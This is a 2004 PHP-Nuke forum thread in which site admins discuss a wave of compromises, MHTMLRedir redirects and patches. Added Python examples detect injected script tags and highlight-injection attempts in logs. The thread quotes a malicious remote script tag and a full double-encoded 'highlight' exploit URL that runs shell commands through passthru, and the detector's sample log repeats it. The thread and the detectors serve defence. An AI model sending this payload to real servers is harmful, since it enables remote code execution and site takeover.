Evaders99 (Site Admin)
Joined: Aug 17, 2003, Posts: 12346
Posted: Sat Nov 20, 2004 7:47 pm

VinDSL (Site Admin)
Joined: Jul 08, 2003, Posts: 1193
Location: Arizona (USA) Site Admin: Lenon.com Admin: Disipal Designs
Posted: Sat Nov 20, 2004 10:30 pm

| sting wrote: |
| ...looks like someone found another sql injection exploit... |
Agreed! It's coming up on everyone's radar lately. I'm gonna 'sticky' this...
_________________ .:: "The further in you go, the bigger it gets!" ::.
.:: VinDSL's Lenon.com | The Disipal Site ::.

VinDSL (Site Admin)
Joined: Jul 08, 2003, Posts: 1193
Location: Arizona (USA) Site Admin: Lenon.com Admin: Disipal Designs
Posted: Sat Nov 20, 2004 11:04 pm

From what I've been reading, this is an accurate description...
One of the biggest problems, from what I've read, is the admin often cannot get into his site to fix things because it redirects him too. Can't get into phpMyAdmin, cPanel - nothing. It all depends on where 'they' stuck the exploit.
LoL! Firefox is looking better all the time, no?
_________________ .:: "The further in you go, the bigger it gets!" ::.
.:: VinDSL's Lenon.com | The Disipal Site ::.

maczan1205 (Nuke Soldier)
Joined: Mar 30, 2004, Posts: 32
Location: Montréal
Posted: Sun Nov 21, 2004 10:19 am

After removing the code above from the Nuke-theme footer as described above, I checked out some other non-Nuke sites that I have on the same domain and found the same code attached to almost every file that had "footer" in the file name.
One good thing came out of this for me anyway: it scared me enough to "get moving" on upgrading from 7.1 - 7.5 to eliminate the web mail tables and files.

lilacskn (Nuke Soldier)
Joined: Mar 11, 2004, Posts: 10
Location: Maine
Posted: Sun Nov 21, 2004 12:47 pm

I am having this on my site too! It's scaring visitors away, and it's an official site... Can anyone help me????
Thanks so much!
Here is my addy: http://jeffbuckleycommunity.com
xoxo jax

chukar (Nuke Cadet)
Joined: Nov 19, 2004, Posts: 7
Posted: Mon Nov 22, 2004 3:53 pm

Not sure if this is the right thread or not, but I'm getting access denied messages when I try to access admin.php. I was hacked over the weekend with a MHTMLRedir.Exploit injection, and I wonder if this is related to that.
| Quote: |
| One of the biggest problems, from what I've read, is the admin often cannot get into his site to fix things because it redirects him too. Can't get into phpMyAdmin, cPanel - nothing. It all depends on where 'they' stuck the exploit. |
I fixed the database problem, but now I can't access admin.php.

sting (Site Admin)
Joined: Jul 24, 2003, Posts: 1985
Location: Apparently ALWAYS Online. . .
Posted: Mon Nov 22, 2004 8:40 pm

| VinDSL wrote: |
| From what I've been reading, this is an accurate description... |
The big issue here is that some sites with Admin Secure have still been hit. I haven't actually seen what has been used for the exploit - has anyone gotten a log of it yet?
-sting
_________________ Is it paranoia if they are really out to get you?
-------------------------------------------------------
sting usually hangs out at nukehaven.net

Evaders99 (Site Admin)
Joined: Aug 17, 2003, Posts: 12346
Posted: Mon Nov 22, 2004 10:33 pm

Weird, mine hasn't with Admin Secure. I know because they've tried hundreds of times over a week period. And another week period before that. All various 61.78.61.* addresses.
Admin Secure blocks this as Cross-Site Scripting, so make sure you enable scripting protection.
_________________ Helping those that help themselves
Read FIRST or DIE!
"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding

schtefan (Nuke Cadet)
Joined: Jun 14, 2004, Posts: 8
Posted: Wed Nov 24, 2004 9:36 am

| Evaders99 wrote: |
| These hacks were blocked by the latest Admin Secure. That's how the IP was recorded. |
Is it through the Admin? Should I change it?
Last edited by schtefan on Sat Feb 03, 2007 11:45 pm; edited 1 time in total

Evaders99 (Site Admin)
Joined: Aug 17, 2003, Posts: 12346
Posted: Wed Nov 24, 2004 12:45 pm

I'm not really sure - I'm getting an error in Admin Secure when trying to look at the specific details of this hacker. This is the only IP range that is constantly hitting my site, so I expect it is this person - but can someone confirm this?
I would apply all security measures immediately. Best chance to catch and stop this hacker. Check the sticky topic for a link to such addons.
_________________ Helping those that help themselves
Read FIRST or DIE!
"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding

solentsurfer (Nuke Cadet)
Joined: Nov 25, 2004, Posts: 1
Posted: Thu Nov 25, 2004 2:16 pm

I don't have Nuke but have an online shop using a MySQL database which has been hacked with MHTMLRedir.exploit.
It appears dynamically; sometimes Norton detects it and sometimes it doesn't. When it does, the bottom address bar on IE shows that another site is trying to be opened. This happens on any page, so it suggests it is in the database, but I cannot find it.
Does anybody have any idea where else it could be or what to look for in a non-Nuke site?
Also, when it does appear, this code is placed just inside the bottom body tag of the page:
| Code: |
| <script language="JavaScript" src="http://www.eagle-inspection.com/data/p.php?i=637...8b&to=http://www.iwar.org.uk/pipermail/infocon/2004-March/2004001207.html"></script> |

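The two symptoms reported above, maczan1205's footer files with the same code "attached" and solentsurfer's script tag sitting just inside the closing body tag, both come down to one check: a script tag whose src points at a host the site does not own, placed at the very end of the page. The following is an added example, not code from the thread or from PHP-Nuke, that looks for exactly that in theme/footer files and strips it. The host list (own_hosts), the scanned file extensions, the placeholder domains and the sample footer are all constructed for the example.

```python
import os
import re
from urllib.parse import urlsplit

# An external <script src=...></script> pair; src may be quoted or bare.
SCRIPT_RE = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*['\"]?(?P<src>[^'\" >]+)[^>]*>\s*</script\s*>",
    re.IGNORECASE,
)


def foreign_script_tags(html, own_hosts):
    """Return (tag, host, just_before_body_close) for each script loaded from a host not in own_hosts."""
    own = {h.lower() for h in own_hosts}
    body_close = html.lower().rfind("</body>")
    findings = []
    for m in SCRIPT_RE.finditer(html):
        host = urlsplit(m.group("src")).hostname  # None for relative paths
        if host is None or host in own:
            continue  # first-party or relative script, leave it alone
        # "Just inside the bottom body tag": nothing but whitespace between the tag and </body>
        just_inside = (
            body_close != -1 and m.end() <= body_close and not html[m.end():body_close].strip()
        )
        findings.append((m.group(0), host, just_inside))
    return findings


def strip_foreign_scripts(html, own_hosts):
    """Return the content with every foreign script tag removed (the caller writes it back)."""
    cleaned = html
    for tag, _, _ in foreign_script_tags(html, own_hosts):
        cleaned = cleaned.replace(tag, "")
    return cleaned


def scan_tree(root, own_hosts, exts=(".php", ".html", ".htm", ".tpl")):
    """Walk a web root read-only and map each affected file to its findings."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = foreign_script_tags(fh.read(), own_hosts)
            except OSError:
                continue
            if found:
                report[path] = found
    return report


# Constructed sample footer; the remote hosts are placeholders (.invalid TLD), not real sites.
SAMPLE_FOOTER = """</td></tr></table>
<script type="text/javascript" src="/includes/menu.js"></script>
<script language="JavaScript" src="http://malware-host.invalid/data/p.php?i=1&to=http://example.invalid/x.html"></script>
</body>
</html>
"""

if __name__ == "__main__":
    for tag, host, just_inside in foreign_script_tags(SAMPLE_FOOTER, ["www.example.com"]):
        print(host, "just inside </body>" if just_inside else "elsewhere", tag)
```

Because foreign_script_tags works on a string, the same check can be pointed at a database dump (mysqldump output, or rows pulled from the tables that hold theme or footer HTML) for the case solentsurfer describes, where the tag is served from the database rather than from a file on disk. Run scan_tree first and keep the report; only write cleaned files back after you have a copy of the originals.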
jacebenson (Nuke Cadet)
Joined: Nov 01, 2003, Posts: 6
Posted: Tue Nov 30, 2004 5:34 pm

Where is the FIX? I need the fix, I've been hit twice.... Please, someone link to Admin Secure if it fixes it? Does it? What can I do? Can I lock the table they're trying to inject? What can I do to stop them?

Evaders99 (Site Admin)
Joined: Aug 17, 2003, Posts: 12346
Posted: Tue Nov 30, 2004 6:00 pm

sting (Site Admin)
Joined: Jul 24, 2003, Posts: 1985
Location: Apparently ALWAYS Online. . .
Posted: Sun Dec 05, 2004 11:28 am

OK, I think I may have found it. Make sure you have the HIGHLIGHT fix taken care of. The latest versions (2.7) of the nuke fixes seem to take care of it - for some reason, on the site I monitor that was hit, Sentinel was loaded but did not catch it until AFTER I had loaded the 2.7 patch.
Sentinel covers it as an abuse - script. The latest IP to attempt it was 62.212.77.34 for those of you blocking IPs, and the script looked something like this:
| Code: |
| www.site.com/modules.php?name=Forums&file=viewtopic&t=87&view=previous%0A&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527&rush=echo%20ITSOK;uname%20-a;echo%20ITISOK; |
Of course, I hope this doesn't get flagged for banning when I try to submit... lol
EDIT - At the risk of splitting the nuke community once again, I am going to post a link to Raven's site. While I know that the personalities of this site and that one often clash, I feel that this information is vital to the nuke community, and rather than copy/paste, I will attempt to bring good will and better security to the nuke community during this holiday season. Or something.
Highlight fix is detailed here - http://ravenphpscripts.com/article635.html.
-sting
_________________ Is it paranoia if they are really out to get you?
-------------------------------------------------------
sting usually hangs out at nukehaven.net

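The request sting posted is the phpBB-derived viewtopic "highlight" injection: the web server decodes the query string once, so %2527 becomes %27, and the vulnerable viewtopic code then calls urldecode() on the highlight value a second time, turning it into a bare single quote that closes the quoted string and lets the attacker splice in passthru($HTTP_GET_VARS[rush]), with the shell command carried in the separate rush parameter. Sting asked earlier whether anyone had a log of the attempt; the following is an added example, not code from the thread, from Sentinel or from PHP-Nuke, that finds such attempts in Apache/nginx combined-format access logs by performing the same double decode and pulling out the command. The log lines, the 192.0.2.x addresses, the list of PHP execution functions and the detection heuristic are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote

# PHP functions an attacker chains after breaking out of the quoted string (assumed list).
EXEC_FUNCS = ("passthru", "system", "exec", "shell_exec", "popen", "eval")

# Apache/nginx "combined" log format: ip ident user [timestamp] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The injected code reads its command from another GET parameter, e.g. $HTTP_GET_VARS[rush].
GETVAR_RE = re.compile(r"\$(?:HTTP_GET_VARS|_GET|_REQUEST)\[\s*'?(\w+)'?\s*\]")


def raw_query_params(path):
    """Split the query string WITHOUT decoding, so the decode steps below stay explicit."""
    params = {}
    for pair in urlsplit(path).query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params[name] = value
    return params


def decode_twice(value):
    """Web server decodes once (%2527 -> %27); viewtopic's urldecode() decodes again (-> ')."""
    return unquote(unquote(value))


def analyze_request(path):
    """Return None for a benign request, else a dict with the decoded payload and command."""
    params = raw_query_params(path)
    if "highlight" not in params:
        return None
    decoded = decode_twice(params["highlight"])
    # A quote alone is normal ("it's"); a quote plus an exec call is the break-out.
    if "'" not in decoded or not any(f + "(" in decoded for f in EXEC_FUNCS):
        return None
    finding = {"highlight": decoded, "command": None}
    m = GETVAR_RE.search(decoded)
    if m and m.group(1) in params:
        finding["command"] = decode_twice(params[m.group(1)])
    return finding


def scan_log(lines):
    """Run analyze_request over combined-format log lines; return one hit per attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = analyze_request(m.group("path"))
        if finding:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"), **finding})
    return hits


# Constructed sample log lines (RFC 5737 test addresses); the first carries the
# request shape posted in the thread, the others are ordinary highlight searches.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Dec/2004:10:14:07 +0000] "GET /modules.php?name=Forums&file=viewtopic'
    '&t=87&view=previous%0A&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47'
    '%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527&rush=echo%20ITSOK;uname%20-a;echo%20ITISOK;'
    ' HTTP/1.1" 200 18342 "-" "Mozilla/4.0"',
    '192.0.2.22 - - [05/Dec/2004:10:15:31 +0000] "GET /modules.php?name=Forums&file=viewtopic'
    '&t=87&highlight=security HTTP/1.1" 200 17110 "-" "Mozilla/5.0"',
    '192.0.2.22 - - [05/Dec/2004:10:16:02 +0000] "GET /modules.php?name=Forums&file=viewtopic'
    '&t=88&highlight=it%27s HTTP/1.1" 200 17210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['ts']} highlight={hit['highlight']!r} command={hit['command']!r}")
```

The decoded highlight for the first sample line comes out as '.passthru($HTTP_GET_VARS[rush]).' and the command as echo ITSOK;uname -a;echo ITISOK;, which is what the attacker expects to see echoed back in the page. Single-encoded variants (%27 instead of %2527) are caught by the same path, since the second unquote() is a no-op once no percent sequences remain. Pair the hit list with the block list discussed in the thread, but treat the IPs as one attempt source among many rather than the fix; the fix is patching the highlight handling.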
Fiona (Private)
Joined: Nov 10, 2004, Posts: 48
Posted: Mon Dec 06, 2004 5:57 pm

| sting wrote: |
| The latest versions (2.7) of the nuke fixes seem to take care of it |
Sting: Does 2.6 handle it?
I'm on earlier versions of Nuke (6.5-7.2) using 2.6, and I can't see anything in 2.7 that significantly affects these earlier versions, which is why I haven't applied it to them.
Any idea if I'm right?
-Fi